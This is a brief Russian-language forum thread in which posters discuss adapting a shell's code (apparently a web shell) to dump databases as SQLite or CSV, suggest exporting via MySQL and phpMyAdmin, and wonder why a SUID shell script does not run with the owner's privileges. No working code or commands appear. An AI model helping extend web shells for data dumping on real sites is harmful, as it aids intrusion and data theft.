Либо как доработать код шелла чтобы можно было выбирать в какой формат дампить желательно Sqlite либо CSV

Поставьте у себя мускль и Phpmyadmin, загоните дамп в мускуль и пхпмайадмином сохраните в CSV

А скуль запросом сохранить с csv header'ом религия не позволяет?

Черт, некропост же)

интересно, почему suid sh файл по такому же принципу не работает?

видимо команды в sh скрипте уже от имени запускающего работают, а не от имени владельца файла, хотя странно - почему так